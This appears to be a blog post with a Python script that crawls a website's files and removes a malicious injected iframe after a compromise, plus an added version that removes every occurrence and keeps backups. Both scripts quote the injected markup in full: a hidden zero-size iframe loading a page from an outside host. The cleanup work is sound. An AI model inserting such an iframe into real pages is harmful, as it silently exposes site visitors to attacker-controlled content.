Find exploit and remove it with python regular expressions
I had an exploit hit a site that wasn't on one of my servers, and there wasn't a backup available to restore from. Still having to fix this, I decided to write a script to inspect all the files and remove the bad text. Mostly the exploit appended an iframe at the end of files, but I wrote my script to remove particular text no matter where it sat in the file.

I wrote a bit about a python file structure crawler and I'll include my whole method below for reference.


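#!/usr/bin/env python3
# By Josh White
# This script starts at the current directory and removes the exploit text
# from all of the files in all folders below it.

import os
import re

# The injected iframe, escaped so "." and other characters match literally.
# A bytes pattern is used because files are read in binary mode, which keeps
# images and other non-text files from raising decode errors.
myre = re.compile(re.escape(b"""<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>"""))
log = []
arglist = []


def check(arg, dirname, fnames):
    # Record the full path of every file name found in dirname.
    for name in fnames:
        arg.append(os.path.join(dirname, name))


# Crawl the directory tree and collect every file path.
for dirname, dirnames, fnames in os.walk("./"):
    check(arglist, dirname, fnames)

for filename in arglist:
    print(filename)
    if os.path.isfile(filename):
        with open(filename, "rb") as fh:
            f = fh.read()
        m = myre.search(f)
        if m:
            print("Exploit found in " + filename)
            # Keep everything before and after the first match.
            newfile = f[0:m.start()] + f[m.end():len(f)]
            with open(filename, "wb") as fh:
                fh.write(newfile)
            log.append(filename + " was repaired\n")

# One repaired file per line.
with open("PYLOG.log", "w") as fh:
    fh.writelines(log)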
 

Basically I compile the bad text as a regular expression, then iterate through every file and search for a match. If a match is found, I replace the bad file with the file minus the bad text. I know this will only find the first instance of the bad text and remove it, and if there were more instances in a single file they wouldn't be found. You could make the if myre.search into a recursive function, or just run the script multiple times!
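For the multiple-instance case described above, here is an added Python 3 example (not part of the original script) that removes every occurrence in a single pass with subn, matches the tag case-insensitively, and keeps an untouched copy of each file it changes. The names clean_file and clean_tree, the .infected suffix and the dry_run switch are assumptions made for this example.

```python
import os
import re
import shutil
import tempfile

# Injected markup from the article; re.escape makes "." match literally.
INJECTED = b'<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>'
PATTERN = re.compile(re.escape(INJECTED), re.IGNORECASE)


def clean_file(path, pattern=PATTERN, dry_run=False):
    """Remove every match from one file; return how many were found."""
    with open(path, "rb") as fh:
        data = fh.read()
    cleaned, count = pattern.subn(b"", data)
    if count and not dry_run:
        shutil.copy2(path, path + ".infected")  # untouched copy for review/undo
        with open(path, "wb") as fh:
            fh.write(cleaned)
    return count


def clean_tree(root, pattern=PATTERN, dry_run=False):
    """Walk root and clean every regular file; return {path: matches}."""
    report = {}
    for dirname, _dirs, fnames in os.walk(root):
        for name in fnames:
            path = os.path.join(dirname, name)
            # Skip our own backup copies and anything that is not a file.
            if name.endswith(".infected") or not os.path.isfile(path):
                continue
            count = clean_file(path, pattern, dry_run)
            if count:
                report[path] = count
    return report


if __name__ == "__main__":
    # Constructed sample tree: one file with three injections, one clean file.
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.html"), "wb") as fh:
        fh.write(INJECTED + b"<html>" + INJECTED.lower() + b"</html>" + INJECTED)
    with open(os.path.join(root, "clean.html"), "wb") as fh:
        fh.write(b"<html></html>")
    print(clean_tree(root, dry_run=True))  # report only, nothing is written
    print(clean_tree(root))                # repair; originals kept as *.infected
    shutil.rmtree(root)
```

The .infected copies still contain the injected iframe, so move them out of the web root once the repair has been checked.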
 

